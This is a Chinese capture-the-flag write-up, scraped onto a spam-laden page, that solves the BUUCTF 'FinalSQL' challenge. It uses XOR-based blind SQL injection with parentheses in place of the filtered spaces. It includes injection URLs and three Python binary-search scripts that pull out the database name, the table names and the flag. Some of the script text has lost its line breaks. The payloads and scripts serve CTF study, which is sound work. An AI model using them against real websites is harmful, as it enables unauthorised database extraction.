当前位置: 首页 > wzjs >正文

1688网站登录百度网站ip地址

1688网站登录,百度网站ip地址,推荐一下做图文的网站,页面设计培训排名Buuctf [极客大挑战 2019]FinalSQL 1.拿到题目先随便点吧 2.根据题目提示,选择正确的神秘代码即可获得flag,尝试点1 3.题目提示,不是这个,点其他的按钮,尝试点击2 4.它说矣,也不是这个,那就再点击3 5…

Buuctf [极客大挑战 2019]FinalSQL

1.拿到题目先随便点吧
在这里插入图片描述
2.根据题目提示,选择正确的神秘代码即可获得flag,尝试点1
在这里插入图片描述

3.题目提示,不是这个,点其他的按钮,尝试点击2
在这里插入图片描述
4.它说矣,也不是这个,那就再点击3
在这里插入图片描述
5.它逗一下我,你找到flag在这里,但是没有,继续点击4
在这里插入图片描述
6.好好,我告诉你,就在下面一个,真的,那就点击5
在这里插入图片描述

7.还查了一下英文单词,它说你是多蠢啊,怎样我才可以给你?因此,为什么不看一下第六个呢?但是它在哪里吗?
在这里插入图片描述

8.聪明的,但是不是这张表,通过上述的判断,我们可以看到id是可以控制的参数,进一步验证我们的推测1'

http://35aacee9-5590-4b43-b6bb-5433adc14afa.node5.buuoj.cn:81/search.php?id=1%27
在这里插入图片描述

9.使用-- -进行注释

http://35aacee9-5590-4b43-b6bb-5433adc14afa.node5.buuoj.cn:81/search.php?id=1%27–%20-
在这里插入图片描述

10.正确输入1的回显是

http://35aacee9-5590-4b43-b6bb-5433adc14afa.node5.buuoj.cn:81/search.php?id=1
在这里插入图片描述

11.通过上面的三个回显,我们所做的总结如下所示

(1)当输入正确时,正确的回显是

NO! Not this! Click others~~~

(2)当输入错误时,错误的回显是

Error!

(3)当输入特殊字符时,被waf拦截的回显是

你可别被我逮住了,臭弟弟

12.我是直接上手SQL注入的fuzz判断其过滤了哪些字符

在这里插入图片描述

13.使用bp爆破的话,就不赘述
在这里插入图片描述

14.需要注意的一点是,不断扩充自己的sql注入的fuzz字典,可以清楚的发现,存在数字型的异或注入
在这里插入图片描述
15.异或的话,还是比较好理解,即相同为0,不同为1

使用异或的表达式如下所示:

1^1=0

1^0=1

0^1=1

0^0=0

本道题目当中,就是利用这样的性质就行求解,尝试使用0^x的情况,只要后面为真的话,那么我们便可以判断数据,这个点是解开这道题目的关键。

16.本地调试

select * from product where id = 962;

在这里插入图片描述

17.查看数据库

select database();
在这里插入图片描述

18.查看数据库长度

select length(database());
在这里插入图片描述
在这里插入图片描述

19.本地测试的数据库为tmall,因此数据库的长度为5,通过sql语句判断出数据库的长度,而在本道数据库的长度判断和本地不一样的情况是,CTF中的数据库过滤了空格,构造语句如下所示

http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id=0^(select(length(database()))%3E0)

在这里插入图片描述

20.这里顺带就引出二分查找法,尝试数据的长度大于15

http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id=0^(select(length(database()))%3E15)

在这里插入图片描述

21.当输入15时,返回错误,尝试大于7

http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id=0^(select(length(database()))%3E7)

在这里插入图片描述

22.当输入7时,返回错误,尝试大于4

http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id=0^(select(length(database()))%3E4)

在这里插入图片描述

23.当输入大于4时,返回错误,尝试大于2

http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id=0^(select(length(database()))%3E4)

在这里插入图片描述

24.当输入2时,返回正确,尝试大于3
在这里插入图片描述

25.通过大于4是错误的,尝试大于5

http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id=0^(select(length(database()))%3E5)

在这里插入图片描述

26.那么说明数据库的长度为4

http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id=0^(select(length(database()))=4)

在这里插入图片描述

27.开始爆破数据库,因为知道数据库的长度为4,那么通过ASCII值推测出数据库的库名

28.本地测试,通过返回的ASCII值判断数据名

select (ord(substr((select(database())),1,1))%3E32);

在这里插入图片描述

29.这里面就有两个可控制的变量,一个是数据库的长度,另外一个数据库名的ASCII码

select (ord(substr((select(database())),数据长度,1))%3E数据库的ASCII值);

那么脚本如下:

# -*- coding: utf-8 -*-
# coding=utf8import requests
import time#payload = 0^(ord(substr(database(),1,1))>32)
#该题目过滤了空格,使用括号绕过
url = "http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id="
# respons = requests.get(url)
# print(respons.text)database_name = ''for x in range(1,100):min = 1max = 150mid = (min + max)//2while min < max:params = {"id":"0^(ord(substr((select(database())),"+str(x)+",1))>"+str(mid)+")"}response = requests.get(url=url,params=params)time.sleep(1)if "others~~~" in response.text:min = mid + 1else:max = midmid = (min+max)//2if min <= 32 or max >= 127:breakdatabase_name += chr(mid)print("数据库名为:" + database_name)

30.这里的ASCII值,有个特性,在32127这样一个范围,代码的话,省去了判断数据库的长度,使用循环的形式得出数据库
在这里插入图片描述

31.通过爆破获得数据库名为geek
在这里插入图片描述

32.爆破数据库的表名:

select (ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='tmall')),1,1))%3E33);

在这里插入图片描述

代码如下所示:

# -*- coding: utf-8 -*-
# coding=utf8import requests
import time#payload = 0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),1,1))>0)
#该题目过滤了空格,使用括号绕过
url = "http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id="
# respons = requests.get(url)
# print(respons.text)tables_name = ''for x in range(1,100):min = 1max = 150mid = (min + max)//2while min < max:params = {"id":"0^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(x)+",1))>"+str(mid)+")"}response = requests.get(url=url,params=params)time.sleep(1)if "others~~~" in response.text:min = mid + 1else:max = midmid = (min+max)//2if min <= 32 or max >= 127:breaktables_name += chr(mid)print("数据库表名为:" + tables_name)

在这里插入图片描述

33.这里爆破字段名是硬伤。使用了很多种办法,都是报错
在这里插入图片描述

34.而在本道题目中,flag存在字段password

# -*- coding: utf-8 -*-
# coding=utf8import requests
import time#payload = 0^(ord(substr(database(),1,1))>32)
#该题目过滤了空格,使用括号绕过
url = "http://0dd93945-1aaf-448f-b57e-0d6636d4dc55.node5.buuoj.cn:81/search.php?id="
# respons = requests.get(url)
# print(respons.text)column_name = ''for x in range(1,1000000):min = 1max = 150mid = (min + max)//2while min < max:#params = {"id":"0^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),"+str(x)+",1))>"+str(mid)+")"+str(x)+",1))>"+str(mid)+")"}# 0^(ord(substr((select(group_concat(password))from(F1naI1y))# params = {"id": "0^(ord(substr((select(group_concat(password))from(F1naI1y))," + str(mid)+")"}# params = {"id": "0^(ord(substr((select(group_concat(password))from(F1naI1y))," + str(x) + ",1))>" + str(mid) + ")"}params = {"id":"(ord(substr((select(group_concat(password))from(F1naI1y)),"+ str(x) + ",1))>" + str(mid) + ")"}response = requests.get(url=url,params=params)time.sleep(1)if "others~~~" in response.text:min = mid + 1else:max = midmid = (min+max)//2if min <= 32 or max >= 127:breakcolumn_name += chr(mid)print("flag:" + column_name)

在这里插入图片描述

http://www.dtcms.com/wzjs/360386.html

相关文章:

  • 网站cname解析优化营商环境工作总结
  • 网站标题改动免费网站电视剧全免费
  • 容桂佛山做app网站百度网站排名seo
  • 做教育行业网站培训班招生方案
  • 云空间的网站在线推广企业网站的方法有哪些
  • 自己建设房源网站河南it渠道网
  • 成人用品怎样做网站推广网站域名综合查询
  • 专门做ppt的网站名称aso投放平台
  • 驻马店网站建设熊掌号地推怎么做最有效
  • wordpress 4.7.3 主题厦门关键词优化平台
  • 宿迁今日头条新闻合肥全网优化
  • 网站建设或网站优化排名seo外包服务
  • 科技成果转化网站建设seo外链软件
  • 学校网站作用torrentkitty磁力搜索引擎
  • 佛山做营销型网站建设google seo教程
  • wordpress菜单美化seo工资
  • 如何给自己网站做网站优化新闻今天
  • 吉安做网站优化链接搜索引擎
  • 百度网盟推广费用是多少seo这个职位是干什么的
  • 115做网站百度指数怎么算
  • wordpress 机器人企业网站seo公司
  • 做网站最主要友情链接导航
  • 焦作北京网站建设重庆网站设计
  • 广州网站设计哪家公司好搜索引擎优化案例
  • 深圳美容网站建设网站建设建站在线建站
  • 佛山集团网站建设网站免费搭建
  • 网站建设优化服务器怎么弄一个网站平台
  • 做建材哪个网站平台好苏州seo网站优化软件
  • 外贸没有公司 如何做企业网站企业建站公司热线电话
  • 京挑客网站建设万能的搜索引擎